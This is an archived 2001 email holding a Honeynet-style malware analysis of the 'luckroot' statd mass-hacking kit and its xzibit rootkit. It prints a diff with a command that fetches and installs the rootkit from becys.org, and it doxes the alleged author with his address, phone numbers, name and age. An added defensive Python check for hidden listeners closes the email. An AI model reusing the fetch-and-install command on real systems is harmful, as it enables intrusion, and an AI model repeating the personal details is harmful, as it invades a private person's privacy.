From niels.heinen@ubizen.com Sat Mar 17 20:02:25 2001
Date: Fri, 09 Mar 2001 18:17:43 +0100
From: Niels Heinen
To: project@honeynet.org
Subject: Scan of the month

Hi all,

I created this document for the scan of the month. I hope it's ok and you'll like it. I had fun writing it though ;))

Best regards

Niels Heinen

[ Part 1.2: "Attached Text" ]

-------------------------------------------------------------------
-- Luckroot analysis --
-------------------------------------------------------------------

Before looking at the files themselves, I first tried to analyse the file names:

luckgo        --> looks like a shell script to fire up the others
luckscan-a    --> statd scanner binary
luckscan-a.c  --> statd scanner source
luckstatdx    --> statd exploit binary
luckstatdx.c  --> statd exploit source

The luckgo file:
-----------------

luckgo: Bourne shell script text

As guessed above, this appears to be a shell script which has been written to fire up the others in order to root web servers found in a class A network. The package is a mass hacking tool. Neato colors ;))

The luckscan-a file:
---------------------

luckscan-a: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped

Luckscan is a class A network scanner which scans for one port. The luckgo script executes this scanner to search for port 111 (portmap) in order to exploit the statd vulnerability in many *nix operating systems (especially Red Hat). If the scanner finds a host which has port 111 open, then the scanner will execute luckstatdx to try and exploit that host.

The luckstatdx file:
---------------------

luckstatdx: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped

This is the funniest file ;) They claimed it was not ripped, but in fact the exploit is based upon ronin's first statd exploit. This can be seen from many similar pieces of code, and the usage *menu* is also pretty much the same.
The exploit binds a root shell to port 39168 on the target system. In the scanner the exploit is executed with this command:

./luckstatdx -d 0

The -d flag means that they are using a hard-coded target system, and the 0 means that this target system is a Red Hat 6.2 system with the nfs-utils-0.1.6-2 package.

The luckstatdx exploit has been modified. This was probably done on a Windows system (damn "^M" carriage returns ;). Here is the diff of the 2 files. I had to remove the ^M's ( perl -i.old -npe 's/\r\n/\n/g' luckstatdx.c ) from luckstatdx.c and the comments from ronin's statdx.c:

$ diff statdx.c luckstatdx.c
0a1
>
161c162
< fprintf(stderr, "statdx by ron1n \n");
---
> fprintf(stderr, "statdx modify by becys \n");
186c187
<
---
// Becys was modify herre some cmd.
188,189c189,190
< send(sockd, "cd /; ls -alF; id;\n", 19, 0);
<
---
> send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lame rk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);
// Aici cred ca trebuie un exit.
249c250
< printf("OMG! You now have rpc.statd technique!@#$!\n");
---
> printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n");
497c498
< printf("A timeout was expected. Attempting connection to shell..\n");
---
> printf("Hmm,maibe i can root it. Attempting connection to shell..\n");
499c500
< printf("Failed\n");
---
> printf("Fucking shit,i cant,sorry.\n");
511d511
<

As you can see, besides the comment changes the most important change is the line which executes commands on the freshly hacked system:

Old command:
send(sockd, "cd /; ls -alF; id;\n", 19, 0);

New command:
send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);

Here we can see that a rootkit called xzibit.tar.gz is retrieved by the hacked system. This rootkit replaces netstat, ps, top, ifconfig and hdparm.
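Review bot: In the 188,189c189,190 hunk of the diff above, the length argument of send() was left at 19 while the command string grew to well over a hundred bytes; send(sockd, buf, 19, 0) transmits only the first 19 bytes, which is exactly "cd /; uname -a; id;", so the wget, tar, ./install and rm -rf part of the line would never reach the shell on the target if the luckstatdx binary was built from this source. Worth verifying against the shipped binary (strings, or the shell traffic on port 39168) before concluding that this is the path by which xzibit.tar.gz arrives. Two smaller points on the same hunk: the added line 190, "Aici cred ca trebuie un exit.", is Romanian for "Here I think an exit is needed", and the diff reads "cd lame rk" while the prose quote of the new command reads "cd lamerk", so one of the two copies carries a stray space.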
It installs linsniffer and sense, which is a perl script that can be used to analyse the output generated by linsniffer. The rootkit also places an ssh backdoor which listens on port 6969. If an http server is running on the server, then the install script of the rootkit will try to install a backdoor CGI script. The script allows remote attackers to execute commands on the server and view the output of the commands.

Files in the xzibit.tar.gz rootkit:

install: Bourne shell script text.
Install is the main installing script which replaces most files.

becys.cgi: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped.
This file is the CGI backdoor.

hdparm: Bourne shell script text.
This file executes the ssh (sshdu) backdoor and the sniffer (linsniffer). The install script uses chattr +i to make sure no one can modify this file.

ifconfig: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped.

linsniffer: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped.
Well known sniffer. The sniffer logs to a file called tcp.log.

logclear: ASCII text.
Logclear is a weird shell script which uses killall -9 to kill linsniffer. The script then removes the tcp.log files and restarts the sniffer. Funny is that #!/bin/sh is not included in this file (messy ;))

netstat: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped.
This looks a lot like the normal netstat, but it's modified all right. When executed it will hide the ssh backdoor.

ps: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped.
Modified ps binary. This ps will not show the ssh backdoor.

sl2: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped.
This binary can be used for a denial of service attack. It has been ripped from the TFN toolkit.
Part of the strings output:

[JSignal Caught. Exiting Cleanly.
[JSegmentation Violation Caught. Exiting Cleanly.
Unknown host %s
sendto
Usage: %s srcaddr dstaddr low high
If srcaddr is 0, random addresses will be used
socket
%i.%i.%i.%i
High port must be greater than Low port.

After a search on the above line "High port must be greater than Low port." I found this web page on GIAC: http://www.sans.org/y2k/TFN_toolkit.htm
It describes the tool and also gives a strings output which looks the same.

s: ASCII text.
This file is the configuration file for the ssh backdoor server.

ssh_host_key: data.
SSH host key.

ssh_random_seed: data.
SSH random seed file.

sshdu: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped.
SSH server.

top: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped.
Modified top.

After all files are in place, an email is sent to becys@becys.org with information about the newly hacked system. This email includes the output of the following commands:

hostname -f
uname -a
ifconfig | grep inet

Now who's responsible:
------------------------

[nielsh@testlab nielsh]$ whois becys.org
[whois.internic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: BECYS.ORG
   Registrar: BULKREGISTER.COM, INC.
   Whois Server: whois.bulkregister.com
   Referral URL: www.bulkregister.com
   Name Server: NS.WEBSITESOURCE.COM
   Name Server: NS2.WEBSITESOURCE.COM
   Updated Date: 11-sep-2000

>>> Last update of whois database: Sat, 3 Mar 2001 08:34:32 EST <<<

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

More, more, I need moooorrreeeee:

[nielsh@testlab nielsh]$ whois becys.org@whois.bulkregister.com
[whois.bulkregister.com]

bSoft
1 Hensel Dr.
Apt.#Z1F
College Station, Texas 77840
US

Domain Name: BECYS.ORG

Administrative Contact:
   Qian Wang  becys@yahoo.com
   bSoft
   1 Hensel Dr.
   Apt.#Z1F
   College Station, Texas 77840
   US
   Phone- (979)862-9233
   Fax-

Technical Contact:
   Web Site Source, In  info@websitesource.com
   Web Site Source, Inc.
   2476 Bolsover, Suite 484
   Houston, TX 77005-2518
   US
   Phone- 713-667-2520
   Fax- 800-863-6499

Record updated on 2000-09-11 00:00:00.
Record created on 2000-09-11.
Record expires on 2002-09-11.
Database last updated on 2001-03-03 01:29:33 EST.

Domain servers in listed order:

NS.WEBSITESOURCE.COM   216.147.43.135
NS2.WEBSITESOURCE.COM  216.147.1.116

Now I think we at least need a phone number. A little search reveals that the creator of this kit has a chip tuning kit for sale: http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1

And long live Yahoo... his phone number is: 093837243 (Romania)

Answers to the questions:
---------------------------

1. What is the blackhat attempting to do with his command line syntax?

He is using the system to hack as many other systems as possible. He retrieves the mass hacking tool from the web site, unpacks it and fires it up against several different networks. The hacker made some typos, probably due to the excitement ;)

2. What does the tool accomplish?

The tool will scan large networks for systems that have port 111 open. If such systems are found, then the tool tries to exploit them using the luckstatdx binary.

3. How does the tool work?

In short: the mass hacking tool scans networks for systems that have port 111 open. If the port is open, the scanner executes an exploit which will only work on Red Hat 6.2 (see above why). If the exploit succeeds, it will perform a couple of commands on the system. The exploit retrieves a rootkit to the freshly hacked system and installs it. When this is done, the hacker is notified by an email which contains information about the newly hacked system.

4. Is this tool a worm, or would you classify it as something else?
You might call this a semi-worm, but it's not a complete worm, because the hacker has to activate the scanner.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

The tool is not original. The files used, such as the exploit and the scanner, are ripped, modified and glued together with a shell script.

6. What information can you obtain about who is using or created the tool?

I found his phone number. The domain is registered with the Yahoo account called becys@yahoo.com. Now with a little research I found that this email address was used for selling a diesel tuning kit on a Romanian web site. The writer goes by the name Dumitru Liviu Mihai and is 18 years old. He has a Yahoo profile page that gave me this information: http://profiles.yahoo.com/becys

And oh... the creator is sooo busted ;))

Best regards,

Niels Heinen

[ Part 2, "S/MIME Cryptographic Signature" ]
[ Application/X-PKCS7-SIGNATURE 4KB. ]
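A host-side check motivated by the rootkit description in the analysis above (the replaced netstat and ps hide the sshdu backdoor on port 6969, and hdparm is shipped as a Bourne shell script in place of the real binary). This is an added example, not code from Niels' analysis, from the luckroot package or from the xzibit rootkit. It compares the kernel's own socket table in /proc/net/tcp, which a trojaned userland netstat cannot filter, with what the netstat binary prints, and flags system binaries that start with a "#!" line instead of the ELF magic. The /proc/net/tcp excerpt and netstat output embedded below are constructed for illustration; only the port numbers come from this page.

```python
"""Spot what a trojaned netstat hides: the kernel's socket table
(/proc/net/tcp) versus what the netstat binary prints, plus a magic-byte
check for system binaries that a rootkit swaps for shell scripts.

Added example for this page, not code from the original analysis or from
the rootkit.  The SAMPLE_* inputs are constructed for illustration.
"""
import subprocess

TCP_LISTEN = "0A"  # value of the 'st' column in /proc/net/tcp for LISTEN sockets

# Constructed /proc/net/tcp excerpt: sshd on 22, portmap on 111 and the
# sshdu backdoor on 6969 (0x1B39) in LISTEN state, plus one ESTABLISHED row.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1024 1 00000000
   1: 00000000:006F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1031 1 00000000
   2: 00000000:1B39 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 2201 1 00000000
   3: 0100007F:0016 0100007F:C34A 01 00000000:00000000 00:00000000 00000000     0        0 2300 1 00000000
"""

# Constructed output of a replaced netstat: the 6969 listener is filtered out.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:22            127.0.0.1:49994         ESTABLISHED
"""


def proc_listeners(proc_net_tcp: str) -> set[int]:
    """Ports in LISTEN state according to the kernel table (ports are hex)."""
    ports = set()
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        if state == TCP_LISTEN:
            ports.add(int(local_addr.rsplit(":", 1)[1], 16))
    return ports


def netstat_listeners(netstat_output: str) -> set[int]:
    """Ports netstat reports as LISTEN (decimal port after the last colon)."""
    ports = set()
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0].startswith("tcp") and fields[5] == "LISTEN":
            ports.add(int(fields[3].rsplit(":", 1)[1]))
    return ports


def hidden_listeners(proc_net_tcp: str, netstat_output: str) -> set[int]:
    """Listening ports the kernel knows about but netstat does not show."""
    return proc_listeners(proc_net_tcp) - netstat_listeners(netstat_output)


ELF_MAGIC = b"\x7fELF"


def looks_replaced_by_script(first_bytes: bytes) -> bool:
    """True when a file that should be an ELF binary starts with '#!' instead
    (the rootkit ships hdparm as a Bourne shell script)."""
    return first_bytes.startswith(b"#!") and not first_bytes.startswith(ELF_MAGIC)


def live_check() -> set[int]:
    """Run the comparison on the current host (Linux only, needs a netstat)."""
    with open("/proc/net/tcp") as f:
        kernel_view = f.read()
    netstat_view = subprocess.run(["netstat", "-ant"], capture_output=True,
                                  text=True, check=False).stdout
    return hidden_listeners(kernel_view, netstat_view)


if __name__ == "__main__":
    print("hidden in sample:", sorted(hidden_listeners(SAMPLE_PROC_NET_TCP, SAMPLE_NETSTAT)))
    # Binaries the rootkit replaces; path names are assumptions for a Red Hat box.
    for name in ("/sbin/hdparm", "/bin/ps", "/bin/netstat", "/sbin/ifconfig"):
        try:
            with open(name, "rb") as f:
                head = f.read(4)
        except OSError:
            continue
        if looks_replaced_by_script(head):
            print(name, "is a script, not an ELF binary")
```

The comparison only catches a userland trojan; a kernel-level hook would also alter /proc/net/tcp, so for this kit the kernel view is the trustworthy side. The same difference can be taken from a known-good netstat copied in from clean media, which is the usual next step once the sample shows a port the local binary will not admit to.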